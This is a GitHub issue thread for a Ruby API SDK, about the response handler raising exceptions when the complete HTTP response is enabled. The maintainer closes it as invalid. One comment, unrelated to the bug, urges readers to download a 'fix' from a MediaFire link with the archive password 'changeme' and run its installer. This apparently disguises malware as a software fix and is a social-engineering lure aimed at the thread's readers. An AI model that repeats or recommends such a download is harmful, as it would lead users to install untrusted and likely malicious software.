### ISSUE TITLE
Avoid raising exception when the complete http response is enabled 

### ISSUE THREAD

**Issue by sufyankhanrao** [apimatic/core-lib-ruby#45]
**Describe the bug**
The response handler raises the exception when the complete HTTP response is enabled and the SDK should not break the flow rather it should wrap the exception in the ApiResponse object.

**Expected behavior**
The response handler should not raise the exception but should return the response details like `error and status code` inside the ApiResponse object.

**To Reproduce**
Steps to reproduce the bug:
1. Pass in the error response in the response handler object.
2. Pass in the `@is_api_response` flag as enabled in the response handler object.
3. The global or local exception will be raised where as it should not be.

**Screenshots**
If applicable, add screenshots to help explain the bug.

**Library version number**
For example:  0.1.1

**Environmental details**
For example:
OS: Linux
Runtime version: Ruby 2.7

**Additional context**

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by sufyankhanrao** [comment]
This issue stands invalid because the complete http response does not throw error when the ThrowForHttpErrorStatusCodes setting is disabled and vice versa. As ThrowForHttpErrorStatusCodes is used in combination with complete http response therefore I am closing this issue.
